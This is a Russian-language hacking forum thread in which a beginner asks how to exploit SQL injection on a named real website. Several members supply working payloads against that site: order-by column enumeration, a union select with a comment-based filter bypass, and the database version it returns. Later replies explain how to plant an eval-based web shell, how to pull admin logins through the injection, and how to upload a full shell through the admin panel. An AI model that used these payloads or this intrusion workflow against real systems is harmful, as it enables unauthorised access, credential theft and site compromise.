28.08.2012, 23:06
|
|
Познающий
Регистрация: 19.05.2012
Сообщений: 98
С нами:
7359446
Репутация:
-10
|
|
Подскажите пожалуйста пытаюс раскрутить скулу site.ru/index.php?ID=1+order+by+13 ошибки нету order+by+14 ошибка есть значить колонок 13
Затем ввожу
site.ru/index.php?ID=1+union+select+1,2,3,4,5,6,7,8,9,10,1 1,12,13+--+
Ошибка.В чём здесь моя ошибка?Спасибо.
|
|
|
28.08.2012, 23:48
|
|
Познающий
Регистрация: 28.07.2012
Сообщений: 39
С нами:
7258646
Репутация:
1
|
|
Сообщение от Sat-hacker
Подскажите пожалуйста пытаюс раскрутить скулу site.ru/index.php?ID=1+order+by+13 ошибки нету order+by+14 ошибка есть значить колонок 13
Затем ввожу
site.ru/index.php?ID=1+union+select+1,2,3,4,5,6,7,8,9,10,1 1,12,13+--+
Ошибка.В чём здесь моя ошибка?Спасибо.
Таким способом колонки не всегда удаётся узнать, линк в студию
|
|
|
|
29.08.2012, 22:52
|
|
Познающий
Регистрация: 19.05.2012
Сообщений: 98
С нами:
7359446
Репутация:
-10
|
|
http://www.greenbergresearch.com/index.php?ID=1+group+by+13+--+
|
|
|
|
29.08.2012, 23:49
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
С нами:
9176038
Репутация:
8
|
|
Сообщение от Sat-hacker
http://www.greenbergresearch.com/index.php?ID=1+group+by+13+--+
неправильно поля подобрал...
Вывод можно получить так
Код:
_ttp://www.greenbergresearch.com/index.php?ID=9/*!union*/+select+1,2,3,4,5,6,7,8,9,10,11,12,unhex(Hex(version())),14--
Failed opening '/var/www/html/inc/templates/ 4.1.12' for inclusion
А вообще тема для таких вопросов тут
|
|
|
|
30.08.2012, 00:33
|
|
Познающий
Регистрация: 28.07.2012
Сообщений: 39
С нами:
7258646
Репутация:
1
|
|
Сообщение от Sat-hacker
http://www.greenbergresearch.com/index.php?ID=1+group+by+13+--+
http://www.greenbergresearch.com/index.php?ID=-1+order+by+15+--+
False
http://www.greenbergresearch.com/index.php?ID=-1+order+by+14+--+
True - Not found
Значит - Столбцов 14
дальше багбир разъяснил. Суть в том, что нужно было ID не действительный сделать, -1 или 999999999999
|
|
|
|
30.08.2012, 00:48
|
|
Познающий
Регистрация: 19.05.2012
Сообщений: 98
С нами:
7359446
Репутация:
-10
|
|
Подскажите а вожможно ли залить shell через такую sql уязвимость?И как?Сори за тупой вопрос.Новичёк в этих делах.
|
|
|
|
30.08.2012, 08:35
|
|
Познающий
Регистрация: 19.05.2012
Сообщений: 98
С нами:
7359446
Репутация:
-10
|
|
Просто не очень понял как при помощи этого кода '' залить shell.
Что за код такой?И как из него может получиться shell?Не не наркоман,просто не могу разобраться вот и спросил.А тему читтал раз 10.Не всё понялю
|
|
|
|
30.08.2012, 08:43
|
|
Новичок
Регистрация: 04.11.2004
Сообщений: 5
С нами:
11322426
Репутация:
0
|
|
Сообщение от Sat-hacker
просто не могу разобраться вот и спросил
просто не пытаешься разобраться вот и спрашиваешь
|
|
|
|
30.08.2012, 08:51
|
|
Познающий
Регистрация: 19.05.2012
Сообщений: 98
С нами:
7359446
Репутация:
-10
|
|
Всё что получалось по инструкции делал сам,но здесь немножко не понял,буду благодарен за помощь.
|
|
|
|
31.08.2012, 00:05
|
|
Познающий
Регистрация: 28.07.2012
Сообщений: 39
С нами:
7258646
Репутация:
1
|
|
Сообщение от Sat-hacker
Просто не очень понял как при помощи этого кода '' залить shell.
Что за код такой?И как из него может получиться shell?Не не наркоман,просто не могу разобраться вот и спросил.А тему читтал раз 10.Не всё понялю
давай разжуём подробнее
eval - это команда, которая вычисляет/обрабатывает строку как PHP код. Т.е например будет равносильно .
А $_GET это переменная окружения, которая берёт содержимое из GET переменной, в данном случае переменная "e", т.е test.ru/index.php?e=PHP_Код
и если index.php будет содержать '', то скрипт выполнит код из переменной "e". Это своего рода минишелл, с помощью него можно залить полноценный. Через SQL инекцию ты код не выполнишь, за исключением, если БД поддерживает его, что очень редко. В замен в ней ты узнаешь пароль и логин админки и другие интересные данный, но это не всегда удаётся..
И потом уже через админку льёшь шелл
Что касается твоего случая... там вообще 4 ветка БД Мускла, так что таблицы необходимо подбирать, для этого можно воспользоваться спец софтом, тем же говнохавиджом. Тебе он самое то..
З.Ы И судя по твоему нику, ты сам окрещаешь себя как ламера, т.е ты завышаешь свои способности, а сам ничего не умеешь, следовательно можно с большой вероятностью предположить, что ты школьник, без обид. Советую отучится сперва, т.к твой интеллект ещё не развит для уровня логичного понимания запросов
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
